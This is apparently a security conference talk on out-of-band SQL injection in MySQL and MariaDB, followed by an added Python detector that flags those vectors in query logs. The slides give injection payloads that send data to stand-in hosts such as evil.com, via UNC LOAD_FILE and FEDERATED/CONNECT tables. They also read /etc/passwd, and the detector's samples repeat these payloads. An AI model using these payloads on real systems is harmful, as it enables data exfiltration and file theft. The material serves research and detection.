[Russia] MySQL OOB injections

OWASP EEE
MySQL OOB injections
Can I surprise you?
@d0znpp
BIO
@d0znpp
● Researcher
● Bug hunter
● Wallarm CEO
MySQL today
● MySQL (http://www.oracle.com/us/products/mysql/overview/index.html)
○ Enterprise Edition (http://www.oracle.com/us/products/mysql/mysqlenterprise/overview/index.html)
○ Standard Edition (http://www.oracle.com/us/products/mysql/mysqlstandard/overview/index.html)
○ Classic Edition (http://www.oracle.com/us/products/mysql/mysqlclassic/overview/index.html)
○ Community Edition (http://www.oracle.com/us/products/mysql/mysqlcommunityserver/overview/index.html)
○ Cluster CGE (http://www.oracle.com/us/products/mysql/mysqlcluster/overview/index.html)
○ Embedded (OEM/ISV) (http://www.oracle.com/us/products/mysql/mysqlembedded/overview/index.html)
● MariaDB (https://mariadb.org/)
● Percona (https://www.percona.com/) *out of scope
SQL injections summary
● Classic (query data is returned in the response), a.k.a. “UNION SELECT”
● Blind (no query data is returned in the response)
Blind SQLi exploitation techniques:
● Using foreign objects (id='and(1<<(id-1)&length(load_file('/etc/passwd')))--)
● Error-based (when SQL errors are returned in responses)
● Boolean search (when the status code or something else indicates the query result)
● Time-based (boolean search where query execution time indicates the result)
● Out-of-band (OOB: LOAD_FILE(CONCAT('\\\\', VERSION(), '.evil.com\\oob')))
Why OOB?
● Faster
● The only way to exploit asynchronous services
What is asynchronous?
● I want to log in. Here are my credentials
● Ok. Wait...
● Is it ready?
● Is it ready?
MySQL injections overview
● Cheat sheets
○ http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
○ https://rdot.org/forum/showthread.php?t=124
● Latest error-based tricks:
○ EXP (https://www.exploit-db.com/docs/37953.pdf)
○ Non-geometric (https://rdot.org/forum/showpost.php?p=37133&postcount=1)
○ BIGINT UNSIGNED (https://rdot.org/forum/showthread.php?t=3167)
○ JSON_* (https://twitter.com/dsrbr/status/649963694533775360)
Out-of-band for MySQL and Windows
UNC filenames on Windows systems (http://arxiv.org/pdf/1303.3047.pdf by Miroslav Štampar)
● LOAD_FILE(CONCAT('\\\\', VERSION(), '.evil.com\\oob')) function
● SELECT … INTO (OUTFILE | DUMPFILE) '...'
And also other file access variants:
● LOAD DATA (LOCAL) INFILE '...'
What you must know about “... LOCAL ...”
● LOAD DATA LOCAL INFILE executes on the MySQL client, not on the server
● The client can define a callback function for this (http://php.net/manual/ru/mysqli.set-local-infile-handler.php)
● By default this callback is implemented in the MySQL client driver
● It supports all wrappers available on your platform
● LOAD DATA LOCAL INFILE '(http|php|expect|...)://...' <- YES! Why not :)
● SSRF is possible there
FEDERATED storage engine OOB
● Different storage engines: MEMORY, CSV, ...
● FEDERATED storage engine (https://dev.mysql.com/doc/refman/5.7/en/federated-storage-engine.html and https://mariadb.com/kb/en/mariadb/about-federatedx/)
● CREATE TABLE … ENGINE=FEDERATED CONNECTION='mysql://…'
CONNECT storage engine OOB (MariaDB)
● Different storage engines: MEMORY, CSV, ...
● CONNECT storage engine (https://mariadb.com/kb/en/mariadb/connect-table-types-mysql-table-type-accessing-mysqlmariadb-tables/ and https://mariadb.com/kb/en/mariadb/connect-security/)
● OOB through the MYSQL and ODBC table_type
● CREATE TABLE t(id int) engine=CONNECT table_type=MYSQL connection='mysql://root@evil.com/database/table';
The use of the CONNECT engine requires the FILE privilege for "outward" tables. This
should not be an important restriction. The use of CONNECT "outward" tables on a remote
server seems of limited interest without knowing the files existing on it and must be
protected anyway. On the other hand, using it on the local client machine is not an issue
because it is always possible to create locally a user with the FILE privilege.
MariaDB CONNECT ENGINE file access
All of these table types support the file_name argument:
● DOS
● DBF
● BIN
● CSV
● FMT
● XML (no XXE there, sorry :)
● JSON
● INI
MariaDB CONNECT ENGINE file access
MariaDB [test]> create table root(a varchar(1024))
engine=connect table_type=CSV file_name='/etc/passwd';
Query OK, 0 rows affected (0.00 sec)
MariaDB [test]> select * from root;
+-----------------------------------------------------------------------+
| a |
+-----------------------------------------------------------------------+
| root:x:0:0:root:/root:/bin/bash |
| bin:x:1:1:bin:/bin:/sbin/nologin |
| daemon:x:2:2:daemon:/sbin:/sbin/nologin |
| adm:x:3:4:adm:/var/adm:/sbin/nologin |
| lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin |
| sync:x:5:0:sync:/sbin:/bin/sync |
+-----------------------------------------------------------------------+
7 rows in set (0.01 sec)
MariaDB CONNECT ENGINE: a piece of the cheat sheet
https://mariadb.com/kb/en/mariadb/connect-table-types-special-virtual-tables/
… table_type=DIR file_name='*.frm' options='subdir=1'
Also only for Windows:
● MAC (network adapter details)
● WMI (really)
Summary
(Diagram) You -> SQL queries -> DBApp -> Evil host. The DBApp reaches the evil host via:
● FEDERATED, CONNECT
● LOAD DATA|XML LOCAL
● UNC load_file, INTO OUTFILE|DUMPFILE
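The vectors in the summary, as detection logic a defender can run over general_log-style query lines. This is an added example and not code from the slides; the hostnames, log lines and rule names are constructed for the demo, and a UNC path is recognised by a string literal that starts with a doubled backslash.

```python
"""Flag MySQL/MariaDB out-of-band (OOB) primitives in logged queries.

Added example for this deck, not the author's code. It scans
general_log-style lines ("Time  Id Command  Argument") and reports
the vectors the summary lists. Hostnames, log lines and rule names
are constructed for the demo.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Injected payloads often swap spaces for /**/ comments and mix case, so
# strip block comments and collapse whitespace before matching. Backslashes
# are left untouched because the UNC rule depends on them.
_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalize(query: str) -> str:
    return " ".join(_COMMENT.sub(" ", query).split())


# (rule name, pattern, why a defender should care). Patterns run on the
# normalized query; '\\{2,} means a string literal starting with \\ (UNC).
RULES = [
    ("unc_load_file",
     re.compile(r"\bload_file\s*\(.*'\\{2,}", re.I),
     "LOAD_FILE() on a \\\\host\\share path: server resolves the name and connects out"),
    ("file_write",
     re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I),
     "INTO OUTFILE/DUMPFILE from app traffic: file write, UNC target leaks data out"),
    ("local_infile_wrapper",
     re.compile(r"\bload\s+data\s+(?:\w+\s+)*local\s+infile\s+'[a-z][\w+.-]*://", re.I),
     "LOAD DATA LOCAL INFILE with a URL wrapper: runs in the client driver (SSRF)"),
    ("federated_table",
     re.compile(r"\bengine\s*=\s*federated\b", re.I),
     "FEDERATED table: server opens a connection to the CONNECTION target"),
    ("connect_remote",
     re.compile(r"\bengine\s*=\s*connect\b.*\btable_type\s*=\s*(mysql|odbc)\b", re.I),
     "MariaDB CONNECT table with MYSQL/ODBC table_type: outbound connection"),
    ("connect_file",
     re.compile(r"\bengine\s*=\s*connect\b.*\b(file_name\s*=|table_type\s*=\s*dir\b)", re.I),
     "MariaDB CONNECT table reading server files (file_name / DIR)"),
]


@dataclass(frozen=True)
class Finding:
    line_no: int
    rule: str
    reason: str
    query: str


# general_log text format: timestamp, thread id, command, argument.
_GENERAL_LOG = re.compile(r"^\S+\s+\d+\s+Query\s+(?P<sql>.*)$")


def classify(query: str) -> list[str]:
    """Return the names of every rule a single query trips, in RULES order."""
    q = normalize(query)
    return [name for name, pat, _ in RULES if pat.search(q)]


def scan_log(text: str) -> list[Finding]:
    """Scan general_log lines; non-Query commands (Connect, Quit) carry no SQL."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), 1):
        m = _GENERAL_LOG.match(line)
        if not m:
            continue
        q = normalize(m["sql"])
        findings.extend(Finding(n, name, why, m["sql"])
                        for name, pat, why in RULES if pat.search(q))
    return findings


# Constructed sample traffic: one benign query, then one query per vector.
SAMPLE_QUERIES = [
    "SELECT id, name FROM users WHERE id = 42",
    r"SELECT LOAD_FILE(CONCAT('\\\\', VERSION(), '.attacker.invalid\\oob'))",
    r"SELECT/**/1/**/INTO/**/OUTFILE/**/'\\\\attacker.invalid\\x'",
    "LOAD DATA LOCAL INFILE 'http://intranet.invalid/' INTO TABLE t",
    "CREATE TABLE f (id INT) ENGINE=FEDERATED CONNECTION='mysql://u@attacker.invalid/db/t'",
    "CREATE TABLE t (id INT) ENGINE=CONNECT table_type=MYSQL connection='mysql://root@attacker.invalid/db/t'",
    "CREATE TABLE pw (a VARCHAR(1024)) ENGINE=CONNECT table_type=CSV file_name='/etc/passwd'",
]
SAMPLE_LOG = "\n".join(
    f"2015-10-09T10:00:{i:02d}Z\t    7 Query\t{q}" for i, q in enumerate(SAMPLE_QUERIES, 1)
) + "\n2015-10-09T10:00:59Z\t    7 Quit\t"


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.reason}\n    {f.query}")
```

The same rules apply to an audit-plugin feed or a proxy log once the SQL text is extracted; the normalisation step is what keeps comment-obfuscated payloads from slipping past them.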
Thanks!
Twitter: @d0znpp